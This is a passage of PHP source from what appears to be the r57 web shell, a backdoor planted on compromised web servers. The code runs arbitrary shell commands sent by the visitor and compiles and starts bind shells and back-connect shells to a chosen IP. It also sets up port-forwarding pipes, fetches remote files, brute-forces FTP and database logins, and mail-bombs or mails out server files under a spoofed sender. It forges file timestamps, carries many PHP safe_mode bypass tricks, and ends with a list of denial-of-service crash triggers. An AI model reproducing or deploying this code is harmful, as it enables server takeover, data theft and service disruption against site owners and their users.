1341 } echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1342 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;
1343 if($unix &&!$safe_mode) { echo "<br>".ws(2)."</b>";
1344 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?procinfo title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
1345 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?version title=\"View proc version\"><b>version</b></a> ".$rb;
1346 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?free title=\"View mem free\"><b>free</b></a> ".$rb;
1347 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?dmesg(8) title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
1348 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?vmstat title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
1349 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lspci title=\"View lspci\"><b>lspci</b></a> ".$rb;
1350 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsdev title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
1351 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?interrupts title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
1352 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise1 title=\"View realise1\"><b>realise1</b></a> ".$rb;
1353 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise2 title=\"View realise2\"><b>realise2</b></a> ".$rb;
1354 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsattr title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
1355 echo "<br>".ws(2)."</b>";
1356 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?w title=\"View w\"><b>w</b></a> ".$rb;
1357 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?who title=\"View who\"><b>who</b></a> ".$rb;
1358 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?uptime title=\"View uptime\"><b>uptime</b></a> ".$rb;
1359 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?last title=\"View last -n 10\"><b>last</b></a> ".$rb;
1360 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?psaux title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
1361 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?service title=\"View service\"><b>service</b></a> ".$rb;
1362 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ifconfig title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;
1363 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?netstat title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
1364 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fstab title=\"View fstab\"><b>fstab</b></a> ".$rb;
1365 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fdisk title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
1366 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?df title=\"View df -h\"><b>df -h</b></a> ".$rb;
1367 } echo '</font></td></tr><table>
1368<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000>
1369<tr><td width=50 style="padding-left:10px"><img src="http://resimyukle.me/server/php/files/76b1a46b883b02d8861e19e68c0b1dd3/computer.png"></td><td align=right width=48>';
1370 echo $font;
1371 if($unix){ echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1372 echo "</td><td>";
1373 echo "<font face=Verdana size=-2 color=red><b>";
1374 echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1375 echo ws(3).$sysctl."<br>";
1376 echo ws(3).ex('echo $OSTYPE')."<br>";
1377 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1378 if(!empty($id)) {echo ws(3).$id."<br>";
1379} else if(@function_exists('posix_geteuid') &&@function_exists('posix_getegid') &&@function_exists('posix_getgrgid') &&@function_exists('posix_getpwuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid());
1380 $egroupinfo = @posix_getgrgid(@posix_getegid());
1381 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
1382 } else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
1383 echo ws(3).$dir;
1384 echo ws(3).'( '.perms(@fileperms($dir)).' )';
1385 echo "</b></font>";
1386 } else { echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1387 echo "</td><td>";
1388 echo "<font face=Verdana size=-2 color=red><b>";
1389 echo ws(3).@substr(@php_uname(),0,120)."<br>";
1390 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1391 echo ws(3).@getenv("USERNAME")."<br>";
1392 echo ws(3).$dir;
1393 echo "<br></font>";
1394 } echo "</font>";
1395 echo "</td></tr></table>";
1396 if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail") { $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
1397 err(6+$res);
1398 $_POST['cmd']="";
1399 } if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_file"&&!empty($_POST['loc_file'])) { if($file=@fopen($_POST['loc_file'],"r")){$filedump = @fread($file,@filesize($_POST['loc_file']));
1400@fclose($file);
1401} else if ($file=readzlib($_POST['loc_file'])) {$filedump = $file;
1402}else {err(1,$_POST['loc_file']);
1403$_POST['cmd']="";
1404} if(isset($_POST['cmd'])) { $filename = @basename($_POST['loc_file']);
1405 $content_encoding=$mime_type='';
1406 compress($filename,$filedump,$_POST['compress']);
1407 $attach = array( "name"=>$filename, "type"=>$mime_type, "content"=>$filedump );
1408 if(empty($_POST['subj'])) {$_POST['subj'] = 'file from r57';
1409} if(empty($_POST['from'])) {$_POST['from'] = 'billy@microsoft.com';
1410} $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1411 err(6+$res);
1412 $_POST['cmd']="";
1413 } } if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_bomber"&&!empty($_POST['mail_flood']) &&!empty($_POST['mail_size'])) { for($h=1;
1414$h<=$_POST['mail_flood'];
1415$h++){ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ",1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
1416 } err(6+$res);
1417 $_POST['cmd']="";
1418 } if(!empty($_POST['cmd']) &&$_POST['cmd'] == "find_text") { $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1419 } if(!empty($_POST['cmd']) &&$_POST['cmd']=="ch_") { switch($_POST['what']) { case 'own': @chown($_POST['param1'],$_POST['param2']);
1420 break;
1421 case 'grp': @chgrp($_POST['param1'],$_POST['param2']);
1422 break;
1423 case 'mod': @chmod($_POST['param1'],intval($_POST['param2'],8));
1424 break;
1425 } $_POST['cmd']="";
1426 } if(!empty($_POST['cmd']) &&$_POST['cmd']=="mk") { switch($_POST['what']) { case 'file': if($_POST['action'] == "create") { if(@file_exists($_POST['mk_name']) ||!$file=@fopen($_POST['mk_name'],"w")) {err(2,$_POST['mk_name']);
1427$_POST['cmd']="";
1428} else { @fclose($file);
1429 $_POST['e_name'] = $_POST['mk_name'];
1430 $_POST['cmd']="edit_file";
1431 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1432 } } else if($_POST['action'] == "delete") { if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1433 $_POST['cmd']="";
1434 } break;
1435 case 'dir': if($_POST['action'] == "create"){ if(@mkdir($_POST['mk_name'])) { $_POST['cmd']="";
1436 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1437 } else {err(2,$_POST['mk_name']);
1438$_POST['cmd']="";
1439} } else if($_POST['action'] == "delete"){ if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1440 $_POST['cmd']="";
1441 } break;
1442 } } if(!empty($_POST['cmd']) &&$_POST['cmd']=="touch") { if(!$_POST['file_name_r']) { $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
1443 $datar = @strtotime($datar);
1444 @touch($_POST['file_name'],$datar,$datar);
1445} else{ @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
1446 } $_POST['cmd']="";
1447 } if(!empty($_POST['cmd']) &&$_POST['cmd']=="edit_file"&&!empty($_POST['e_name'])) { if(!$file=@fopen($_POST['e_name'],"r+")) {$filedump = @fread($file,@filesize($_POST['e_name']));
1448@fclose($file);
1449$only_read = 1;
1450} if($file=@fopen($_POST['e_name'],"r")) {$filedump = @fread($file,@filesize($_POST['e_name']));
1451@fclose($file);
1452} else if ($file=readzlib($_POST['e_name'])) {$filedump = $file;
1453$only_read = 1;
1454}else {err(1,$_POST['e_name']);
1455$_POST['cmd']="";
1456} if(isset($_POST['cmd'])) { echo $table_up3;
1457 echo $font;
1458 echo "<form name=save_file method=post>";
1459 echo ws(3)."<b>".$_POST['e_name']."</b>";
1460 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1461 echo @htmlspecialchars($filedump);
1462 echo "</textarea>";
1463 echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1464 echo "<input type=hidden name=dir value=".$dir.">";
1465 echo "<input type=hidden name=cmd value=save_file>";
1466 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1467 echo "</div>";
1468 echo "</font>";
1469 echo "</form>";
1470 echo "</td></tr></table>";
1471 exit();
1472 } } if(!empty($_POST['cmd']) &&$_POST['cmd']=="save_file") { $mtime = @filemtime($_POST['e_name']);
1473 if((!$file=@fopen($_POST['e_name'],"w")) &&(!function_exists('file_put_contents'))) {err(0,$_POST['e_name']);
1474} else { if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
1475 @fwrite($file,$_POST['e_text']) or @fputs($file,$_POST['e_text']) or @file_put_contents($_POST['e_name'],$_POST['e_text']);
1476 @touch($_POST['e_name'],$mtime,$mtime);
1477 $_POST['cmd']="";
1478 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1479 } } if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl")) { cf("/tmp/prxpl",$prx_pl);
1480 $p2=which("perl");
1481 $blah = ex($p2." /tmp/prxpl ".$_POST['proxy_port']." &");
1482 $_POST['cmd']="ps -aux | grep prxpl";
1483 } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) { cf("/tmp/bd.c",$port_bind_bd_c);
1484 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1485 @unlink("/tmp/bd.c");
1486 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
1487 $_POST['cmd']="ps -aux | grep bd";
1488 } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) { cf("/tmp/bdpl",$port_bind_bd_pl);
1489 $p2=which("perl");
1490 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1491 $_POST['cmd']="ps -aux | grep bdpl";
1492 } if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="Perl")) { cf("/tmp/back",$back_connect);
1493 $p2=which("perl");
1494 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1495 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1496 } if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="C")) { cf("/tmp/back.c",$back_connect_c);
1497 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1498 @unlink("/tmp/back.c");
1499 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1500 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1501 } if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="Perl")) { cf("/tmp/dp",$datapipe_pl);
1502 $p2=which("perl");
1503 $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1504 $_POST['cmd']="ps -aux | grep dp";
1505 } if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="C")) { cf("/tmp/dpc.c",$datapipe_c);
1506 $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1507 @unlink("/tmp/dpc.c");
1508 $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1509 $_POST['cmd']="ps -aux | grep dpc";
1510 } if (!empty($_POST['alias']) &&isset($aliases[$_POST['alias']])) {$_POST['cmd'] = $aliases[$_POST['alias']];
1511} for($upl=0;
1512$upl<=16;
1513$upl++) { if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){ if(!empty($_POST['new_name']) &&($upl==0)) {$nfn = $_POST['new_name'];
1514} else {$nfn = $HTTP_POST_FILES['userfile'.$upl]['name'];
1515} @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn) or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
1516 } } if (!empty($_POST['with']) &&!empty($_POST['rem_file']) &&!empty($_POST['loc_file'])) { switch($_POST['with']) { case 'fopen': $datafile = @implode("",@file($_POST['rem_file']));
1517 if($datafile) { $w_file=@fopen($_POST['loc_file'],"wb") or @function_exists('file_put_contents') or err(0);
1518 if($w_file) { @fwrite($w_file,$datafile) or @fputs($w_file,$datafile) or @file_put_contents($_POST['loc_file'],$datafile);
1519 @fclose($w_file);
1520 } } $_POST['cmd'] = '';
1521 break;
1522 case 'wget': $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1523 break;
1524 case 'fetch': $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1525 break;
1526 case 'lynx': $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1527 break;
1528 case 'links': $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1529 break;
1530 case 'GET': $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1531 break;
1532 case 'curl': $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1533 break;
1534 } } if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_file_up") ||($_POST['cmd']=="ftp_file_down"))) { list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1535 if(empty($ftp_port)) {$ftp_port = 21;
1536} $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1537 if(!$connection) {err(3);
1538} else { if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) {err(4);
1539} else { if($_POST['cmd']=="ftp_file_down") {if(chop($_POST['loc_file'])==$dir) {$_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']);
1540}@ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);
1541} if($_POST['cmd']=="ftp_file_up") {@ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);
1542} } } @ftp_close($connection);
1543 $_POST['cmd'] = "";
1544 } if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_brute") ||($_POST['cmd']=="db_brute"))) { if($_POST['cmd']=="ftp_brute"){ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1545 if(empty($ftp_port)) {$ftp_port = 21;
1546} $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1547 }else if($_POST['cmd']=="db_brute"){ $connection = 1;
1548 } if(!$connection) {err(3);
1549$_POST['cmd'] = "";
1550} else if(($_POST['brute_method']=='passwd') &&(!$users=get_users('/etc/passwd'))){echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>";
1551$_POST['cmd'] = "";
1552} else if(($_POST['brute_method']=='dic') &&(!$users=get_users($_POST['dictionary']))){echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>";
1553$_POST['cmd'] = "";
1554} if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);
1555} } echo $table_up3;
1556 if (empty($_POST['cmd']) &&!$safe_mode &&!$open_basedir) {$_POST['cmd']=(!$unix)?("dir"):("ls -lia");
1557} else if(empty($_POST['cmd']) &&($safe_mode ||$open_basedir)){$_POST['cmd']="safe_dir";
1558} echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
1559 if($safe_mode ||$open_basedir) { switch($_POST['cmd']) { case 'safe_dir': $d=@dir($dir);
1560 if ($d) { while (false!==($file=$d->read())) { if ($file=="."||$file=="..") continue;
1561 @clearstatcache();
1562 @list ($dev,$inode,$inodep,$nlink,$uid,$gid,$inodev,$size,$atime,$mtime,$ctime,$bsize) = stat($file);
1563 if(!$unix){ echo date("d.m.Y H:i",$mtime);
1564 if(@is_dir($file)) echo " <DIR> ";
1565else printf("% 7s ",$size);
1566 } else{ if(@function_exists('posix_getpwuid')){ $owner = @posix_getpwuid($uid);
1567 $grgid = @posix_getgrgid($gid);
1568 }else{$owner['name']=$grgid['name']='';
1569} echo $inode." ";
1570 echo perms(@fileperms($file));
1571 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
1572 echo date("d.m.Y H:i ",$mtime);
1573 } echo "$file\n";
1574 } $d->close();
1575 } else if(@function_exists('glob')) { function eh($errno,$errstr,$errfile,$errline) { global $D,$c,$i;
1576 preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/",$errstr,$o);
1577 if($o){$D[$c] = $o[2];
1578$c++;
1579} } $error_reporting = @ini_get('error_reporting');
1580 error_reporting(E_WARNING);
1581 @ini_set("display_errors",1);
1582 $root = "/";
1583 if($dir) $root = $dir;
1584 $c = 0;
1585$D = array();
1586 @set_error_handler("eh");
1587 $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
1588 for($i=0;
1589$i <strlen($chars);
1590$i++) { $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}";
1591 $prevD = $D[count($D)-1];
1592 @glob($path."*");
1593 if($D[count($D)-1] != $prevD) { for($j=0;
1594$j <strlen($chars);
1595$j++) { $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}";
1596 $prevD2 = $D[count($D)-1];
1597 @glob($path."*");
1598 if($D[count($D)-1] != $prevD2) { for($p=0;
1599$p <strlen($chars);
1600$p++) { $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
1601 $prevD3 = $D[count($D)-1];
1602 @glob($path."*");
1603 if($D[count($D)-1] != $prevD3) { for($r=0;
1604$r <strlen($chars);
1605$r++) { $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
1606 @glob($path."*");
1607 } } } } } } } $D = array_unique($D);
1608 foreach($D as $item) echo htmlspecialchars("{$item}")."\r\n";
1609 error_reporting($error_reporting);
1610 } else echo $lang[$language.'_text29'];
1611 break;
1612 case 'test1': $ci = @curl_init("file://".$_POST['test1_file']);
1613 $cf = @curl_exec($ci);
1614 echo htmlspecialchars($cf);
1615 break;
1616 case 'test2': @include($_POST['test2_file']);
1617 break;
1618 case 'test3': if(empty($_POST['test3_port'])) {$_POST['test3_port'] = "3306";
1619} $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
1620 if($db) { if(@mysql_select_db($_POST['test3_md'],$db)) { @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1621 @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
1622 @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
1623 $r = @mysql_query("SELECT * FROM temp_r57_table");
1624 while(($r_sql = @mysql_fetch_array($r))) {echo @htmlspecialchars($r_sql[0])."\r\n";
1625} @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1626 } else echo "[-] ERROR! Can't select database";
1627 @mysql_close($db);
1628 } else echo "[-] ERROR! Can't connect to mysql server";
1629 break;
1630 case 'test4': if(empty($_POST['test4_port'])) {$_POST['test4_port'] = "1433";
1631} $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
1632 if($db) { if(@mssql_select_db($_POST['test4_md'],$db)) { @mssql_query("drop table r57_temp_table",$db);
1633 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
1634 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
1635 $res = mssql_query("select * from r57_temp_table",$db);
1636 while(($row=@mssql_fetch_row($res))) { echo htmlspecialchars($row[0])."\r\n";
1637 } @mssql_query("drop table r57_temp_table",$db);
1638 } else echo "[-] ERROR! Can't select database";
1639 @mssql_close($db);
1640 } else echo "[-] ERROR! Can't connect to MSSQL server";
1641 break;
1642 case 'test5': $temp=tempnam($dir,"fname");
1643 if (@file_exists($temp)) @unlink($temp);
1644 $extra = "-C ".$_POST['test5_file']." -X $temp";
1645 @mb_send_mail(NULL,NULL,NULL,NULL,$extra);
1646 $str = moreread($temp);
1647 echo htmlspecialchars($str);
1648 @unlink($temp);
1649 break;
1650 case 'test6': $stream = @imap_open('/etc/passwd',"","");
1651 $dir_list = @imap_list($stream,trim($_POST['test6_file']),"*");
1652 for ($i = 0;
1653$i <count($dir_list);
1654$i++) echo htmlspecialchars($dir_list[$i])."\r\n";
1655 @imap_close($stream);
1656 break;
1657 case 'test7': $stream = @imap_open($_POST['test7_file'],"","");
1658 $str = @imap_body($stream,1);
1659 echo htmlspecialchars($str);
1660 @imap_close($stream);
1661 break;
1662 case 'test8': $temp=@tempnam($_POST['test8_file2'],"copytemp");
1663 $str = readzlib($_POST['test8_file1'],$temp);
1664 echo htmlspecialchars($str);
1665 @unlink($temp);
1666 break;
1667 case 'test9': @ini_restore("safe_mode");
1668 @ini_restore("open_basedir");
1669 $str = moreread($_POST['test9_file']);
1670 echo htmlspecialchars($str);
1671 break;
1672 case 'test10': @ob_clean();
1673 $error_reporting = @ini_get('error_reporting');
1674 error_reporting(E_ALL ^E_NOTICE);
1675 @ini_set("display_errors",1);
1676 $str=fopen($_POST['test10_file'],"r");
1677 while(!feof($str)){print htmlspecialchars(fgets($str));
1678} fclose($str);
1679 error_reporting($error_reporting);
1680 break;
1681 case 'test11': @ob_clean();
1682 $temp = 'zip://'.$_POST['test11_file'];
1683 $str = moreread($temp);
1684 echo htmlspecialchars($str);
1685 break;
1686 case 'test12': @ob_clean();
1687 $temp = 'compress.bzip2://'.$_POST['test12_file'];
1688 $str = moreread($temp);
1689 echo htmlspecialchars($str);
1690 break;
1691 case 'test13': @error_log($_POST['test13_file1'],3,"php://../../../../../../../../../../../".$_POST['test13_file2']);
1692 echo $lang[$language.'_text61'];
1693 break;
1694 case 'test14': @session_save_path($_POST['test14_file2']."\0;
1695/tmp");
1696 @session_start();
1697 @$_SESSION[php]=$_POST['test14_file1'];
1698 echo $lang[$language.'_text61'];
1699 break;
1700 case 'test15': @readfile($_POST['test15_file1'],3,"php://../../../../../../../../../../../".$_POST['test15_file2']);
1701 echo $lang[$language.'_text61'];
1702 break;
1703 case 'test16': if (fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
1704 break;
1705 case 'test17_1': @unlink('symlinkread');
1706 @symlink('a/a/a/a/a/a/','dummy');
1707 @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'],'symlinkread');
1708 @unlink('dummy');
1709 while (1) { @symlink('.','dummy');
1710 @unlink('dummy');
1711 } break;
1712 case 'test17_2': $str='';
1713 while (strlen($str) <3) { $temp = 'symlinkread';
1714 $str = moreread($temp);
1715 if($str){@ob_clean();
1716echo htmlspecialchars($str);
1717} } break;
1718 case 'test17_3': $dir = $files = array();
1719 if(@version_compare(@phpversion(),"5.0.0")>=0){ while (@count($dir) <3) { $dir=@scandir('symlinkread');
1720 if (@count($dir) >2) {@ob_clean();
1721@print_r($dir);
1722} } } else { while (@count($files) <3) { $dh = @opendir('symlinkread');
1723 while (false !== ($filename = @readdir($dh))) { $files[] = $filename;
1724 } if(@count($files) >2){@ob_clean();
1725@print_r($files);
1726} } } break;
1727 } } if((!$safe_mode) &&($_POST['cmd']!="php_eval") &&($_POST['cmd']!="mysql_dump") &&($_POST['cmd']!="db_query") &&($_POST['cmd']!="ftp_brute") &&($_POST['cmd']!="db_brute")){ $cmd_rep = ex($_POST['cmd']);
1728 if(!$unix) {echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n";
1729} else {echo @htmlspecialchars($cmd_rep)."\n";
1730}} switch($_POST['cmd']) { case 'dos1': function a() {a();
1731}a();
1732 break;
1733 case 'dos2': @pack("d4294967297",2);
1734 break;
1735 case 'dos3': $a = "a";
1736@unserialize(@str_replace('1',2147483647,@serialize($a)));
1737 break;
1738 case 'dos4': $t = array(1);
1739while (1) {$a[] = &$t;
1740};
1741 break;
1742 case 'dos5': @dl("sqlite.so");
1743$db = new SqliteDatabase("foo");
1744 break;
1745 case 'dos6': preg_match('/(.(?!b))*/',@str_repeat("a",10000));
1746 break;
1747 case 'dos7': @str_replace("A",str_repeat("B",65535),str_repeat("A",65538));
1748 break;
1749 case 'dos8': @shell_exec("killall -11 httpd");
1750 break;
1751 case 'dos9': function cx(){@tempnam("/www/","../../../../../../var/tmp/cx");
1752cx();
1753}cx();
1754 break;
1755 case 'dos10': $a = @str_repeat ("A",438013);
1756$b = @str_repeat ("B",951140);
1757@wordwrap ($a,0,$b,0);
1758 break;
1759 case 'dos11': @array_fill(1,123456789,"Infigo-IS");
1760 break;
1761 case 'dos12': @substr_compare("A","A",12345678);
1762 break;
1763 case 'dos13': @unserialize("a:2147483649:{");
1764 break;
1765 case 'dos14': $Data = @str_ireplace("\n","<br>",$Data);
1766 break;
1767 case 'dos15': function toUTF($x) {return chr(($x >>6) +192) .chr(($x &63) +128);
1768} $str1 = "";
1769for($i=0;
1770$i <64;
1771$i++){$str1 .= toUTF(977);
1772} @htmlentities($str1,ENT_NOQUOTES,"UTF-8");
1773 break;
1774 case 'dos16': $r = @zip_open("x.zip");
1775$e = @zip_read($r);
1776$x = @zip_entry_open($r,$e);
1777 for ($i=0;
1778$i<1000;
1779$i++) $arr[$i]=array(array(""));
1780 unset($arr[600]);
1781@zip_entry_read($e,-1);
1782unset($arr[601]);
1783 break;
1784 case 'dos17': $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
1785 $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
1786 $x = "AQ ";
1787 unset($z);
1788unset($y);
1789$x = base64_decode($x);
1790$y = @sqlite_udf_decode_binary($x);
1791unset($x);
1792 break;
1793 case 'dos18': $MSGKEY = 519052;
1794$msg_id = @msg_get_queue ($MSGKEY,0600);
1795 if (!@msg_send ($msg_id,1,'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH',false,true,$msg_err)) echo "Msg not sent because $msg_err\n";
